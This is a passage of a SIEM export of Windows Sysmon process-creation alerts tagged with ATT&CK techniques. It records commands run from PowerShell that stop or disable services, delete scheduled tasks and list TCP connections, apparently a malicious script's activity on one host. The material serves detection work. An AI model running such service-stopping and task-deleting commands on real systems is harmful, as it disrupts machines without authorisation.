Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Config \\\""Microsoft Telemetry\\\"" Start= Disabled"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:23.012",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:54.829 +ProcessGuid: {df9fc3d3-b3ae-5ecf-0000-00106aa82500} +ProcessId: 3496 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop SVSHost +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:54.831636400Z"",""eventRecordID"":""2852"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:54.829\r\nProcessGuid: {df9fc3d3-b3ae-5ecf-0000-00106aa82500}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop SVSHost\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:54.829"",""processGuid"":""{df9fc3d3-b3ae-5ecf-0000-00106aa82500}"",""processId"":""3496"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop SVSHost"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:22.963",8,"ATT&CK T1489: Stop Windows Service","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:54.778 +ProcessGuid: {df9fc3d3-b3ae-5ecf-0000-0010f7a52500} +ProcessId: 4816 +Image: C:\Windows\System32\sc.exe +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: Service Control Manager Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: sc.exe +CommandLine: ""C:\Windows\system32\sc.exe"" Stop xWinWpdSrv +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:54.781730000Z"",""eventRecordID"":""2849"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:54.778\r\nProcessGuid: {df9fc3d3-b3ae-5ecf-0000-0010f7a52500}\r\nProcessId: 4816\r\nImage: C:\\Windows\\System32\\sc.exe\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: Service Control Manager Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: sc.exe\r\nCommandLine: \""C:\\Windows\\system32\\sc.exe\"" Stop xWinWpdSrv\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:54.778"",""processGuid"":""{df9fc3d3-b3ae-5ecf-0000-0010f7a52500}"",""processId"":""4816"",""image"":""C:\\\\Windows\\\\System32\\\\sc.exe"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""Service Control Manager Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""sc.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\sc.exe\\\"" Stop xWinWpdSrv"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=E46C638010C25479F66BACBE8596CA76,SHA256=39C59C362649090B4D34E5C8221C6E86552C07FE2DF3478D591A68B70917BC0A,IMPHASH=35A7FFDE18D444A92D32C8B2879450FF"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.775",8,"ATT&CK: Quick Execution of a Series of Suspicious Commands","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:34.393 +ProcessGuid: {df9fc3d3-b39a-5ecf-0000-0010da232200} +ProcessId: 2096 +Image: C:\Windows\System32\NETSTAT.EXE +FileVersion: 10.0.18362.1 (WinBuild.160101.0800) +Description: TCP/IP Netstat Command +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: netstat.exe +CommandLine: ""C:\Windows\system32\NETSTAT.EXE"" -anop TCP +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=2445DECE99DEEDBD701DC6DFE10E648E,SHA256=5A780D6630639FFB7FD3D295C182EAA2A7CAD2C70248C5BA8F334BB3803353CA,IMPHASH=F495C58FFEE3A623AD7AAA6BE78756D5 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\NETSTAT.EXE\"" -anop TCP",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:34.413366800Z"",""eventRecordID"":""2842"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:34.393\r\nProcessGuid: {df9fc3d3-b39a-5ecf-0000-0010da232200}\r\nProcessId: 2096\r\nImage: C:\\Windows\\System32\\NETSTAT.EXE\r\nFileVersion: 10.0.18362.1 (WinBuild.160101.0800)\r\nDescription: TCP/IP Netstat Command\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: netstat.exe\r\nCommandLine: \""C:\\Windows\\system32\\NETSTAT.EXE\"" -anop TCP\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=2445DECE99DEEDBD701DC6DFE10E648E,SHA256=5A780D6630639FFB7FD3D295C182EAA2A7CAD2C70248C5BA8F334BB3803353CA,IMPHASH=F495C58FFEE3A623AD7AAA6BE78756D5\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:34.393"",""processGuid"":""{df9fc3d3-b39a-5ecf-0000-0010da232200}"",""processId"":""2096"",""image"":""C:\\\\Windows\\\\System32\\\\NETSTAT.EXE"",""fileVersion"":""10.0.18362.1 (WinBuild.160101.0800)"",""description"":""TCP/IP Netstat Command"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""netstat.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\NETSTAT.EXE\\\"" -anop TCP"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=2445DECE99DEEDBD701DC6DFE10E648E,SHA256=5A780D6630639FFB7FD3D295C182EAA2A7CAD2C70248C5BA8F334BB3803353CA,IMPHASH=F495C58FFEE3A623AD7AAA6BE78756D5"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.362",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:33.031 +ProcessGuid: {df9fc3d3-b399-5ecf-0000-0010eef62100} +ProcessId: 6112 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ECDnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:33.035819600Z"",""eventRecordID"":""2841"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:33.031\r\nProcessGuid: {df9fc3d3-b399-5ecf-0000-0010eef62100}\r\nProcessId: 6112\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN ECDnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:33.031"",""processGuid"":""{df9fc3d3-b399-5ecf-0000-0010eef62100}"",""processId"":""6112"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN ECDnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.314",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.994 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-001028f52100} +ProcessId: 7588 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN DnsCore /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:33.002732600Z"",""eventRecordID"":""2840"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.994\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-001028f52100}\r\nProcessId: 7588\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN DnsCore /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.994"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-001028f52100}"",""processId"":""7588"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN DnsCore /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:19:02.275",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:50:32.947 +ProcessGuid: {df9fc3d3-b398-5ecf-0000-00100bf32100} +ProcessId: 6024 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN ""Update service for Windows Service"" /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:50:32.953201400Z"",""eventRecordID"":""2839"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:50:32.947\r\nProcessGuid: {df9fc3d3-b398-5ecf-0000-00100bf32100}\r\nProcessId: 6024\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN \""Update service for Windows Service\"" /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:50:32.947"",""processGuid"":""{df9fc3d3-b398-5ecf-0000-00100bf32100}"",""processId"":""6024"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN \\\""Update service for Windows Service\\\"" /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 